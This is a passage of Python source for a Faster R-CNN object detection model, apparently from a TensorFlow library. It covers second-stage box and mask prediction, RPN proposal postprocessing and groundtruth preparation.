`self.max_num_proposals` for each image.
4) proposal_boxes: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes in absolute coordinates.
5) proposal_boxes_normalized: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing decoded proposal
bounding boxes in normalized coordinates. Can be used to override the
boxes proposed by the RPN, thus enabling one to extract features and
get box classification and prediction for externally selected areas
of the image.
6) box_classifier_features: a 4-D float32/bfloat16 tensor
representing the features for each proposal.
If self._return_raw_detections_during_predict is True, the dictionary
will also contain:
7) raw_detection_boxes: a 4-D float32 tensor with shape
[batch_size, self.max_num_proposals, num_classes, 4] in normalized
coordinates.
8) raw_detection_feature_map_indices: a 3-D int32 tensor with shape
[batch_size, self.max_num_proposals, num_classes].
"""
proposal_boxes_normalized, num_proposals = self._proposal_postprocess(
rpn_box_encodings, rpn_objectness_predictions_with_background, anchors,
image_shape, true_image_shapes)
prediction_dict = self._box_prediction(rpn_features_to_crop,
proposal_boxes_normalized,
image_shape, true_image_shapes)
prediction_dict['num_proposals'] = num_proposals
return prediction_dict
def _box_prediction(self, rpn_features_to_crop, proposal_boxes_normalized,
image_shape, true_image_shapes):
"""Predicts the output tensors from second stage of Faster R-CNN.
Args:
rpn_features_to_crop: A 4-D float32 or bfloat16 tensor with shape
[batch_size, height, width, depth] representing image features to crop
using the proposal boxes predicted by the RPN.
proposal_boxes_normalized: A float tensor with shape [batch_size,
max_num_proposals, 4] representing the (potentially zero padded)
proposal boxes for all images in the batch. These boxes are represented
as normalized coordinates.
image_shape: A 1D int32 tensors of size [4] containing the image shape.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
prediction_dict: a dictionary holding "raw" prediction tensors:
1) refined_box_encodings: a 3-D float32 tensor with shape
[total_num_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings, where
total_num_proposals=batch_size*self._max_num_proposals. If using a
shared box across classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
2) class_predictions_with_background: a 3-D float32 tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors, where
total_num_proposals=batch_size*self._max_num_proposals.
Note that this tensor *includes* background class predictions
(at class index 0).
3) proposal_boxes: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes in absolute coordinates.
4) proposal_boxes_normalized: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing decoded proposal
bounding boxes in normalized coordinates. Can be used to override the
boxes proposed by the RPN, thus enabling one to extract features and
get box classification and prediction for externally selected areas
of the image.
5) box_classifier_features: a 4-D float32/bfloat16 tensor
representing the features for each proposal.
If self._return_raw_detections_during_predict is True, the dictionary
will also contain:
6) raw_detection_boxes: a 4-D float32 tensor with shape
[batch_size, self.max_num_proposals, num_classes, 4] in normalized
coordinates.
7) raw_detection_feature_map_indices: a 3-D int32 tensor with shape
[batch_size, self.max_num_proposals, num_classes].
8) final_anchors: a 3-D float tensor of shape [batch_size,
self.max_num_proposals, 4] containing the reference anchors for raw
detection boxes in normalized coordinates.
"""
flattened_proposal_feature_maps = (
self._compute_second_stage_input_feature_maps(
rpn_features_to_crop, proposal_boxes_normalized))
box_classifier_features = self._extract_box_classifier_features(
flattened_proposal_feature_maps)
if self._mask_rcnn_box_predictor.is_keras_model:
box_predictions = self._mask_rcnn_box_predictor(
[box_classifier_features],
prediction_stage=2)
else:
box_predictions = self._mask_rcnn_box_predictor.predict(
[box_classifier_features],
num_predictions_per_location=[1],
scope=self.second_stage_box_predictor_scope,
prediction_stage=2)
refined_box_encodings = tf.squeeze(
box_predictions[box_predictor.BOX_ENCODINGS],
axis=1, name='all_refined_box_encodings')
class_predictions_with_background = tf.squeeze(
box_predictions[box_predictor.CLASS_PREDICTIONS_WITH_BACKGROUND],
axis=1, name='all_class_predictions_with_background')
absolute_proposal_boxes = ops.normalized_to_image_coordinates(
proposal_boxes_normalized, image_shape, self._parallel_iterations)
prediction_dict = {
'refined_box_encodings': tf.cast(refined_box_encodings,
dtype=tf.float32),
'class_predictions_with_background':
tf.cast(class_predictions_with_background, dtype=tf.float32),
'proposal_boxes': absolute_proposal_boxes,
'box_classifier_features': box_classifier_features,
'proposal_boxes_normalized': proposal_boxes_normalized,
'final_anchors': proposal_boxes_normalized
}
if self._return_raw_detections_during_predict:
prediction_dict.update(self._raw_detections_and_feature_map_inds(
refined_box_encodings, absolute_proposal_boxes, true_image_shapes))
return prediction_dict
def _raw_detections_and_feature_map_inds(
self, refined_box_encodings, absolute_proposal_boxes, true_image_shapes):
"""Returns raw detections and feat map inds from where they originated.
Args:
refined_box_encodings: [total_num_proposals, num_classes,
self._box_coder.code_size] float32 tensor.
absolute_proposal_boxes: [batch_size, self.max_num_proposals, 4] float32
tensor representing decoded proposal bounding boxes in absolute
coordinates.
true_image_shapes: [batch, 3] int32 tensor where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
A dictionary with raw detection boxes, and the feature map indices from
which they originated.
"""
box_encodings_batch = tf.reshape(
refined_box_encodings,
[-1, self.max_num_proposals, refined_box_encodings.shape[1],
self._box_coder.code_size])
raw_detection_boxes_absolute = self._batch_decode_boxes(
box_encodings_batch, absolute_proposal_boxes)
raw_detection_boxes_normalized = shape_utils.static_or_dynamic_map_fn(
self._normalize_and_clip_boxes,
elems=[raw_detection_boxes_absolute, true_image_shapes],
dtype=tf.float32)
detection_feature_map_indices = tf.zeros_like(
raw_detection_boxes_normalized[:, :, :, 0], dtype=tf.int32)
return {
fields.PredictionFields.raw_detection_boxes:
raw_detection_boxes_normalized,
fields.PredictionFields.raw_detection_feature_map_indices:
detection_feature_map_indices
}
def _extract_box_classifier_features(self, flattened_feature_maps):
if self._feature_extractor_for_box_classifier_features == (
_UNINITIALIZED_FEATURE_EXTRACTOR):
self._feature_extractor_for_box_classifier_features = (
self._feature_extractor.get_box_classifier_feature_extractor_model(
name=self.second_stage_feature_extractor_scope))
if self._feature_extractor_for_box_classifier_features:
box_classifier_features = (
self._feature_extractor_for_box_classifier_features(
flattened_feature_maps))
else:
box_classifier_features = (
self._feature_extractor.extract_box_classifier_features(
flattened_feature_maps,
scope=self.second_stage_feature_extractor_scope))
return box_classifier_features
def _predict_third_stage(self, prediction_dict, image_shapes):
"""Predicts non-box, non-class outputs using refined detections.
For training, masks as predicted directly on the box_classifier_features,
which are region-features from the initial anchor boxes.
For inference, this happens after calling the post-processing stage, such
that masks are only calculated for the top scored boxes.
Args:
prediction_dict: a dictionary holding "raw" prediction tensors:
1) refined_box_encodings: a 3-D tensor with shape
[total_num_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings, where
total_num_proposals=batch_size*self._max_num_proposals. If using a
shared box across classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
2) class_predictions_with_background: a 3-D tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors, where
total_num_proposals=batch_size*self._max_num_proposals.
Note that this tensor *includes* background class predictions
(at class index 0).
3) num_proposals: An int32 tensor of shape [batch_size] representing the
number of proposals generated by the RPN. `num_proposals` allows us
to keep track of which entries are to be treated as zero paddings and
which are not since we always pad the number of proposals to be
`self.max_num_proposals` for each image.
4) proposal_boxes: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes in absolute coordinates.
5) box_classifier_features: a 4-D float32 tensor representing the
features for each proposal.
image_shapes: A 2-D int32 tensors of shape [batch_size, 3] containing
shapes of images in the batch.
Returns:
prediction_dict: a dictionary that in addition to the input predictions
does hold the following predictions as well:
1) mask_predictions: a 4-D tensor with shape
[batch_size, max_detection, mask_height, mask_width] containing
instance mask predictions.
"""
if self._is_training:
curr_box_classifier_features = prediction_dict['box_classifier_features']
detection_classes = prediction_dict['class_predictions_with_background']
if self._mask_rcnn_box_predictor.is_keras_model:
mask_predictions = self._mask_rcnn_box_predictor(
[curr_box_classifier_features],
prediction_stage=3)
else:
mask_predictions = self._mask_rcnn_box_predictor.predict(
[curr_box_classifier_features],
num_predictions_per_location=[1],
scope=self.second_stage_box_predictor_scope,
prediction_stage=3)
prediction_dict['mask_predictions'] = tf.squeeze(mask_predictions[
box_predictor.MASK_PREDICTIONS], axis=1)
else:
detections_dict = self._postprocess_box_classifier(
prediction_dict['refined_box_encodings'],
prediction_dict['class_predictions_with_background'],
prediction_dict['proposal_boxes'],
prediction_dict['num_proposals'],
image_shapes)
prediction_dict.update(detections_dict)
detection_boxes = detections_dict[
fields.DetectionResultFields.detection_boxes]
detection_classes = detections_dict[
fields.DetectionResultFields.detection_classes]
rpn_features_to_crop = prediction_dict['rpn_features_to_crop']
batch_size = tf.shape(detection_boxes)[0]
max_detection = tf.shape(detection_boxes)[1]
flattened_detected_feature_maps = (
self._compute_second_stage_input_feature_maps(
rpn_features_to_crop, detection_boxes))
curr_box_classifier_features = self._extract_box_classifier_features(
flattened_detected_feature_maps)
if self._mask_rcnn_box_predictor.is_keras_model:
mask_predictions = self._mask_rcnn_box_predictor(
[curr_box_classifier_features],
prediction_stage=3)
else:
mask_predictions = self._mask_rcnn_box_predictor.predict(
[curr_box_classifier_features],
num_predictions_per_location=[1],
scope=self.second_stage_box_predictor_scope,
prediction_stage=3)
detection_masks = tf.squeeze(mask_predictions[
box_predictor.MASK_PREDICTIONS], axis=1)
_, num_classes, mask_height, mask_width = (
detection_masks.get_shape().as_list())
_, max_detection = detection_classes.get_shape().as_list()
prediction_dict['mask_predictions'] = tf.reshape(
detection_masks, [-1, num_classes, mask_height, mask_width])
if num_classes > 1:
detection_masks = self._gather_instance_masks(
detection_masks, detection_classes)
detection_masks = tf.cast(detection_masks, tf.float32)
prediction_dict[fields.DetectionResultFields.detection_masks] = (
tf.reshape(tf.sigmoid(detection_masks),
[batch_size, max_detection, mask_height, mask_width]))
return prediction_dict
def _gather_instance_masks(self, instance_masks, classes):
"""Gathers the masks that correspond to classes.
Args:
instance_masks: A 4-D float32 tensor with shape
[K, num_classes, mask_height, mask_width].
classes: A 2-D int32 tensor with shape [batch_size, max_detection].
Returns:
masks: a 3-D float32 tensor with shape [K, mask_height, mask_width].
"""
_, num_classes, height, width = instance_masks.get_shape().as_list()
k = tf.shape(instance_masks)[0]
instance_masks = tf.reshape(instance_masks, [-1, height, width])
classes = tf.cast(tf.reshape(classes, [-1]), dtype=tf.int32)
gather_idx = tf.range(k) * num_classes + classes
return tf.gather(instance_masks, gather_idx)
def _extract_rpn_feature_maps(self, preprocessed_inputs):
"""Extracts RPN features.
This function extracts two feature maps: a feature map to be directly
fed to a box predictor (to predict location and objectness scores for
proposals) and a feature map from which to crop regions which will then
be sent to the second stage box classifier.
Args:
preprocessed_inputs: a [batch, height, width, channels] image tensor.
Returns:
rpn_box_predictor_features: A 4-D float32 tensor with shape
[batch, height, width, depth] to be used for predicting proposal boxes
and corresponding objectness scores.
rpn_features_to_crop: A 4-D float32 tensor with shape
[batch, height, width, depth] representing image features to crop using
the proposals boxes.
anchors: A BoxList representing anchors (for the RPN) in
absolute coordinates.
image_shape: A 1-D tensor representing the input image shape.
"""
image_shape = tf.shape(preprocessed_inputs)
rpn_features_to_crop, self.endpoints = self._extract_proposal_features(
preprocessed_inputs)
feature_map_shape = tf.shape(rpn_features_to_crop)
anchors = box_list_ops.concatenate(
self._first_stage_anchor_generator.generate([(feature_map_shape[1],
feature_map_shape[2])]))
rpn_box_predictor_features = (
self._first_stage_box_predictor_first_conv(rpn_features_to_crop))
return (rpn_box_predictor_features, rpn_features_to_crop,
anchors, image_shape)
def _extract_proposal_features(self, preprocessed_inputs):
if self._feature_extractor_for_proposal_features == (
_UNINITIALIZED_FEATURE_EXTRACTOR):
self._feature_extractor_for_proposal_features = (
self._feature_extractor.get_proposal_feature_extractor_model(
name=self.first_stage_feature_extractor_scope))
if self._feature_extractor_for_proposal_features:
proposal_features = (
self._feature_extractor_for_proposal_features(preprocessed_inputs),
{})
else:
proposal_features = (
self._feature_extractor.extract_proposal_features(
preprocessed_inputs,
scope=self.first_stage_feature_extractor_scope))
return proposal_features
def _predict_rpn_proposals(self, rpn_box_predictor_features):
"""Adds box predictors to RPN feature map to predict proposals.
Note resulting tensors will not have been postprocessed.
Args:
rpn_box_predictor_features: A 4-D float32 tensor with shape
[batch, height, width, depth] to be used for predicting proposal boxes
and corresponding objectness scores.
Returns:
box_encodings: 3-D float tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted boxes.
objectness_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, 2] containing class
predictions (logits) for each of the anchors. Note that this
tensor *includes* background class predictions (at class index 0).
Raises:
RuntimeError: if the anchor generator generates anchors corresponding to
multiple feature maps. We currently assume that a single feature map
is generated for the RPN.
"""
num_anchors_per_location = (
self._first_stage_anchor_generator.num_anchors_per_location())
if len(num_anchors_per_location) != 1:
raise RuntimeError('anchor_generator is expected to generate anchors '
'corresponding to a single feature map.')
if self._first_stage_box_predictor.is_keras_model:
box_predictions = self._first_stage_box_predictor(
[rpn_box_predictor_features])
else:
box_predictions = self._first_stage_box_predictor.predict(
[rpn_box_predictor_features],
num_anchors_per_location,
scope=self.first_stage_box_predictor_scope)
box_encodings = tf.concat(
box_predictions[box_predictor.BOX_ENCODINGS], axis=1)
objectness_predictions_with_background = tf.concat(
box_predictions[box_predictor.CLASS_PREDICTIONS_WITH_BACKGROUND],
axis=1)
return (tf.squeeze(box_encodings, axis=2),
objectness_predictions_with_background)
def _remove_invalid_anchors_and_predictions(
self,
box_encodings,
objectness_predictions_with_background,
anchors_boxlist,
clip_window):
"""Removes anchors that (partially) fall outside an image.
Also removes associated box encodings and objectness predictions.
Args:
box_encodings: 3-D float tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted boxes.
objectness_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, 2] containing class
predictions (logits) for each of the anchors. Note that this
tensor *includes* background class predictions (at class index 0).
anchors_boxlist: A BoxList representing num_anchors anchors (for the RPN)
in absolute coordinates.
clip_window: a 1-D tensor representing the [ymin, xmin, ymax, xmax]
extent of the window to clip/prune to.
Returns:
box_encodings: 4-D float tensor of shape
[batch_size, num_valid_anchors, self._box_coder.code_size] containing
predicted boxes, where num_valid_anchors <= num_anchors
objectness_predictions_with_background: 2-D float tensor of shape
[batch_size, num_valid_anchors, 2] containing class
predictions (logits) for each of the anchors, where
num_valid_anchors <= num_anchors. Note that this
tensor *includes* background class predictions (at class index 0).
anchors: A BoxList representing num_valid_anchors anchors (for the RPN) in
absolute coordinates.
"""
pruned_anchors_boxlist, keep_indices = box_list_ops.prune_outside_window(
anchors_boxlist, clip_window)
def _batch_gather_kept_indices(predictions_tensor):
return shape_utils.static_or_dynamic_map_fn(
functools.partial(tf.gather, indices=keep_indices),
elems=predictions_tensor,
dtype=tf.float32,
parallel_iterations=self._parallel_iterations,
back_prop=True)
return (_batch_gather_kept_indices(box_encodings),
_batch_gather_kept_indices(objectness_predictions_with_background),
pruned_anchors_boxlist)
def _flatten_first_two_dimensions(self, inputs):
"""Flattens `K-d` tensor along batch dimension to be a `(K-1)-d` tensor.
Converts `inputs` with shape [A, B, ..., depth] into a tensor of shape
[A * B, ..., depth].
Args:
inputs: A float tensor with shape [A, B, ..., depth]. Note that the first
two and last dimensions must be statically defined.
Returns:
A float tensor with shape [A * B, ..., depth] (where the first and last
dimension are statically defined.
"""
combined_shape = shape_utils.combined_static_and_dynamic_shape(inputs)
flattened_shape = tf.stack([combined_shape[0] * combined_shape[1]] +
combined_shape[2:])
return tf.reshape(inputs, flattened_shape)
def postprocess(self, prediction_dict, true_image_shapes):
"""Convert prediction tensors to final detections.
This function converts raw predictions tensors to final detection results.
See base class for output format conventions. Note also that by default,
scores are to be interpreted as logits, but if a score_converter is used,
then scores are remapped (and may thus have a different interpretation).
If number_of_stages=1, the returned results represent proposals from the
first stage RPN and are padded to have self.max_num_proposals for each
image; otherwise, the results can be interpreted as multiclass detections
from the full two-stage model and are padded to self._max_detections.
Args:
prediction_dict: a dictionary holding prediction tensors (see the
documentation for the predict method. If number_of_stages=1, we
expect prediction_dict to contain `rpn_box_encodings`,
`rpn_objectness_predictions_with_background`, `rpn_features_to_crop`,
and `anchors` fields. Otherwise we expect prediction_dict to
additionally contain `refined_box_encodings`,
`class_predictions_with_background`, `num_proposals`,
`proposal_boxes` and, optionally, `mask_predictions` fields.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
detections: a dictionary containing the following fields
detection_boxes: [batch, max_detection, 4]
detection_scores: [batch, max_detections]
detection_multiclass_scores: [batch, max_detections, 2]
detection_anchor_indices: [batch, max_detections]
detection_classes: [batch, max_detections]
(this entry is only created if rpn_mode=False)
num_detections: [batch]
raw_detection_boxes: [batch, total_detections, 4]
raw_detection_scores: [batch, total_detections, num_classes + 1]
Raises:
ValueError: If `predict` is called before `preprocess`.
"""
with tf.name_scope('FirstStagePostprocessor'):
if self._number_of_stages == 1:
(proposal_boxes, proposal_scores, proposal_multiclass_scores,
num_proposals, raw_proposal_boxes,
raw_proposal_scores) = self._postprocess_rpn(
prediction_dict['rpn_box_encodings'],
prediction_dict['rpn_objectness_predictions_with_background'],
prediction_dict['anchors'], true_image_shapes, true_image_shapes)
return {
fields.DetectionResultFields.detection_boxes:
proposal_boxes,
fields.DetectionResultFields.detection_scores:
proposal_scores,
fields.DetectionResultFields.detection_multiclass_scores:
proposal_multiclass_scores,
fields.DetectionResultFields.num_detections:
tf.cast(num_proposals, dtype=tf.float32),
fields.DetectionResultFields.raw_detection_boxes:
raw_proposal_boxes,
fields.DetectionResultFields.raw_detection_scores:
raw_proposal_scores
}
# TODO(jrru): Remove mask_predictions from _post_process_box_classifier.
if (self._number_of_stages == 2 or
(self._number_of_stages == 3 and self._is_training)):
with tf.name_scope('SecondStagePostprocessor'):
mask_predictions = prediction_dict.get(box_predictor.MASK_PREDICTIONS)
detections_dict = self._postprocess_box_classifier(
prediction_dict['refined_box_encodings'],
prediction_dict['class_predictions_with_background'],
prediction_dict['proposal_boxes'],
prediction_dict['num_proposals'],
true_image_shapes,
mask_predictions=mask_predictions)
if 'rpn_features_to_crop' in prediction_dict and self._initial_crop_size:
detections_dict[
'detection_features'] = self._add_detection_features_output_node(
detections_dict[fields.DetectionResultFields.detection_boxes],
prediction_dict['rpn_features_to_crop'])
return detections_dict
if self._number_of_stages == 3:
# Post processing is already performed in 3rd stage. We need to transfer
# postprocessed tensors from `prediction_dict` to `detections_dict`.
# Remove any items from the prediction dictionary if they are not pure
# Tensors.
non_tensor_predictions = [
k for k, v in prediction_dict.items() if not isinstance(v, tf.Tensor)]
for k in non_tensor_predictions:
tf.logging.info('Removing {0} from prediction_dict'.format(k))
prediction_dict.pop(k)
return prediction_dict
def _add_detection_features_output_node(self, detection_boxes,
rpn_features_to_crop):
"""Add detection features to outputs.
This function extracts box features for each box in rpn_features_to_crop.
It returns the extracted box features, reshaped to
[batch size, max_detections, height, width, depth], and average pools
the extracted features across the spatial dimensions and adds a graph node
to the pooled features named 'pooled_detection_features'
Args:
detection_boxes: a 3-D float32 tensor of shape
[batch_size, max_detections, 4] which represents the bounding boxes.
rpn_features_to_crop: A 4-D float32 tensor with shape
[batch, height, width, depth] representing image features to crop using
the proposals boxes.
Returns:
detection_features: a 4-D float32 tensor of shape
[batch size, max_detections, height, width, depth] representing
cropped image features
"""
with tf.name_scope('SecondStageDetectionFeaturesExtract'):
flattened_detected_feature_maps = (
self._compute_second_stage_input_feature_maps(
rpn_features_to_crop, detection_boxes))
detection_features_unpooled = self._extract_box_classifier_features(
flattened_detected_feature_maps)
batch_size = tf.shape(detection_boxes)[0]
max_detections = tf.shape(detection_boxes)[1]
detection_features_pool = tf.reduce_mean(
detection_features_unpooled, axis=[1, 2])
reshaped_detection_features_pool = tf.reshape(
detection_features_pool,
[batch_size, max_detections, tf.shape(detection_features_pool)[-1]])
reshaped_detection_features_pool = tf.identity(
reshaped_detection_features_pool, 'pooled_detection_features')
reshaped_detection_features = tf.reshape(
detection_features_unpooled,
[batch_size, max_detections,
tf.shape(detection_features_unpooled)[1],
tf.shape(detection_features_unpooled)[2],
tf.shape(detection_features_unpooled)[3]])
return reshaped_detection_features
def _postprocess_rpn(self,
rpn_box_encodings_batch,
rpn_objectness_predictions_with_background_batch,
anchors,
image_shapes,
true_image_shapes):
"""Converts first stage prediction tensors from the RPN to proposals.
This function decodes the raw RPN predictions, runs non-max suppression
on the result.
Note that the behavior of this function is slightly modified during
training --- specifically, we stop the gradient from passing through the
proposal boxes and we only return a balanced sampled subset of proposals
with size `second_stage_batch_size`.
Args:
rpn_box_encodings_batch: A 3-D float32 tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted proposal box encodings.
rpn_objectness_predictions_with_background_batch: A 3-D float tensor of
shape [batch_size, num_anchors, 2] containing objectness predictions
(logits) for each of the anchors with 0 corresponding to background
and 1 corresponding to object.
anchors: A 2-D tensor of shape [num_anchors, 4] representing anchors
for the first stage RPN. Note that `num_anchors` can differ depending
on whether the model is created in training or inference mode.
image_shapes: A 2-D tensor of shape [batch, 3] containing the shapes of
images in the batch.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
proposal_boxes: A float tensor with shape
[batch_size, max_num_proposals, 4] representing the (potentially zero
padded) proposal boxes for all images in the batch. These boxes are
represented as normalized coordinates.
proposal_scores: A float tensor with shape
[batch_size, max_num_proposals] representing the (potentially zero
padded) proposal objectness scores for all images in the batch.
proposal_multiclass_scores: A float tensor with shape
[batch_size, max_num_proposals, 2] representing the (potentially zero
padded) proposal multiclass scores for all images in the batch.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
raw_detection_boxes: [batch, total_detections, 4] tensor with decoded
proposal boxes before Non-Max Suppression.
raw_detection_scores: [batch, total_detections,
num_classes_with_background] tensor of multi-class scores for raw
proposal boxes.
"""
rpn_box_encodings_batch = tf.expand_dims(rpn_box_encodings_batch, axis=2)
rpn_encodings_shape = shape_utils.combined_static_and_dynamic_shape(
rpn_box_encodings_batch)
tiled_anchor_boxes = tf.tile(
tf.expand_dims(anchors, 0), [rpn_encodings_shape[0], 1, 1])
proposal_boxes = self._batch_decode_boxes(rpn_box_encodings_batch,
tiled_anchor_boxes)
raw_proposal_boxes = tf.squeeze(proposal_boxes, axis=2)
rpn_objectness_softmax = tf.nn.softmax(
rpn_objectness_predictions_with_background_batch)
rpn_objectness_softmax_without_background = rpn_objectness_softmax[:, :, 1]
clip_window = self._compute_clip_window(image_shapes)
additional_fields = {'multiclass_scores': rpn_objectness_softmax}
(proposal_boxes, proposal_scores, _, _, nmsed_additional_fields,
num_proposals) = self._first_stage_nms_fn(
tf.expand_dims(raw_proposal_boxes, axis=2),
tf.expand_dims(rpn_objectness_softmax_without_background, axis=2),
additional_fields=additional_fields,
clip_window=clip_window)
if self._is_training:
proposal_boxes = tf.stop_gradient(proposal_boxes)
if not self._hard_example_miner:
(groundtruth_boxlists, groundtruth_classes_with_background_list, _,
groundtruth_weights_list
) = self._format_groundtruth_data(true_image_shapes)
(proposal_boxes, proposal_scores,
num_proposals) = self._sample_box_classifier_batch(
proposal_boxes, proposal_scores, num_proposals,
groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_weights_list)
# normalize proposal boxes
def normalize_boxes(args):
proposal_boxes_per_image = args[0]
image_shape = args[1]
normalized_boxes_per_image = box_list_ops.to_normalized_coordinates(
box_list.BoxList(proposal_boxes_per_image), image_shape[0],
image_shape[1], check_range=False).get()
return normalized_boxes_per_image
normalized_proposal_boxes = shape_utils.static_or_dynamic_map_fn(
normalize_boxes, elems=[proposal_boxes, image_shapes], dtype=tf.float32)
raw_normalized_proposal_boxes = shape_utils.static_or_dynamic_map_fn(
normalize_boxes,
elems=[raw_proposal_boxes, image_shapes],
dtype=tf.float32)
proposal_multiclass_scores = (
nmsed_additional_fields.get('multiclass_scores')
if nmsed_additional_fields else None)
return (normalized_proposal_boxes, proposal_scores,
proposal_multiclass_scores, num_proposals,
raw_normalized_proposal_boxes, rpn_objectness_softmax)
def _sample_box_classifier_batch(
self,
proposal_boxes,
proposal_scores,
num_proposals,
groundtruth_boxlists,
groundtruth_classes_with_background_list,
groundtruth_weights_list):
"""Samples a minibatch for second stage.
Args:
proposal_boxes: A float tensor with shape
[batch_size, num_proposals, 4] representing the (potentially zero
padded) proposal boxes for all images in the batch. These boxes are
represented in absolute coordinates.
proposal_scores: A float tensor with shape
[batch_size, num_proposals] representing the (potentially zero
padded) proposal objectness scores for all images in the batch.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
groundtruth_boxlists: A list of BoxLists containing (absolute) coordinates
of the groundtruth boxes.
groundtruth_classes_with_background_list: A list of 2-D one-hot
(or k-hot) tensors of shape [num_boxes, num_classes+1] containing the
class targets with the 0th index assumed to map to the background class.
groundtruth_weights_list: A list of 1-D tensors of shape [num_boxes]
indicating the weight associated with the groundtruth boxes.
Returns:
proposal_boxes: A float tensor with shape
[batch_size, second_stage_batch_size, 4] representing the (potentially
zero padded) proposal boxes for all images in the batch. These boxes
are represented in absolute coordinates.
proposal_scores: A float tensor with shape
[batch_size, second_stage_batch_size] representing the (potentially zero
padded) proposal objectness scores for all images in the batch.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
"""
single_image_proposal_box_sample = []
single_image_proposal_score_sample = []
single_image_num_proposals_sample = []
for (single_image_proposal_boxes,
single_image_proposal_scores,
single_image_num_proposals,
single_image_groundtruth_boxlist,
single_image_groundtruth_classes_with_background,
single_image_groundtruth_weights) in zip(
tf.unstack(proposal_boxes),
tf.unstack(proposal_scores),
tf.unstack(num_proposals),
groundtruth_boxlists,
groundtruth_classes_with_background_list,
groundtruth_weights_list):
single_image_boxlist = box_list.BoxList(single_image_proposal_boxes)
single_image_boxlist.add_field(fields.BoxListFields.scores,
single_image_proposal_scores)
sampled_boxlist = self._sample_box_classifier_minibatch_single_image(
single_image_boxlist,
single_image_num_proposals,
single_image_groundtruth_boxlist,
single_image_groundtruth_classes_with_background,
single_image_groundtruth_weights)
sampled_padded_boxlist = box_list_ops.pad_or_clip_box_list(
sampled_boxlist,
num_boxes=self._second_stage_batch_size)
single_image_num_proposals_sample.append(tf.minimum(
sampled_boxlist.num_boxes(),
self._second_stage_batch_size))
bb = sampled_padded_boxlist.get()
single_image_proposal_box_sample.append(bb)
single_image_proposal_score_sample.append(
sampled_padded_boxlist.get_field(fields.BoxListFields.scores))
return (tf.stack(single_image_proposal_box_sample),
tf.stack(single_image_proposal_score_sample),
tf.stack(single_image_num_proposals_sample))
def _format_groundtruth_data(self, true_image_shapes):
"""Helper function for preparing groundtruth data for target assignment.
In order to be consistent with the model.DetectionModel interface,
groundtruth boxes are specified in normalized coordinates and classes are
specified as label indices with no assumed background category. To prepare
for target assignment, we:
1) convert boxes to absolute coordinates,
2) add a background class at class index 0
3) groundtruth instance masks, if available, are resized to match
image_shape.
Args:
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
groundtruth_boxlists: A list of BoxLists containing (absolute) coordinates
of the groundtruth boxes.
groundtruth_classes_with_background_list: A list of 2-D one-hot
(or k-hot) tensors of shape [num_boxes, num_classes+1] containing the
class targets with the 0th index assumed to map to the background class.
groundtruth_masks_list: If present, a list of 3-D tf.float32 tensors of
shape [num_boxes, image_height, image_width] containing instance masks.
This is set to None if no masks exist in the provided groundtruth.
"""
groundtruth_boxlists = [
box_list_ops.to_absolute_coordinates(
box_list.BoxList(boxes), true_image_shapes[i, 0],
true_image_shapes[i, 1])
for i, boxes in enumerate(
self.groundtruth_lists(fields.BoxListFields.boxes))
]
groundtruth_classes_with_background_list = []
for one_hot_encoding in self.groundtruth_lists(
fields.BoxListFields.classes):
groundtruth_classes_with_background_list.append(
tf.cast(
tf.pad(one_hot_encoding, [[0, 0], [1, 0]], mode='CONSTANT'),
dtype=tf.float32))
groundtruth_masks_list = self._groundtruth_lists.get(
fields.BoxListFields.masks)
# TODO(rathodv): Remove mask resizing once the legacy pipeline is deleted.
if groundtruth_masks_list is not None and self._resize_masks:
resized_masks_list = []
for mask in groundtruth_masks_list:
_, resized_mask, _ = self._image_resizer_fn(
# Reuse the given `image_resizer_fn` to resize groundtruth masks.
# `mask` tensor for an image is of the shape [num_masks,
# image_height, image_width]. Below we create a dummy image of the
# the shape [image_height, image_width, 1] to use with
# `image_resizer_fn`.
image=tf.zeros(tf.stack([tf.shape(mask)[1],
tf.shape(mask)[2], 1])),
masks=mask)
resized_masks_list.append(resized_mask)
groundtruth_masks_list = resized_masks_list
# Masks could be set to bfloat16 in the input pipeline for performance
# reasons. Convert masks back to floating point space here since the rest of
# this module assumes groundtruth to be of float32 type.
float_groundtruth_masks_list = []
if groundtruth_masks_list:
for mask in groundtruth_masks_list:
float_groundtruth_masks_list.append(tf.cast(mask, tf.float32))
groundtruth_masks_list = float_groundtruth_masks_list
if self.groundtruth_has_field(fields.BoxListFields.weights):
groundtruth_weights_list = self.groundtruth_lists(
fields.BoxListFields.weights)
else:
# Set weights for all batch elements equally to 1.0
groundtruth_weights_list = []
for groundtruth_classes in groundtruth_classes_with_background_list:
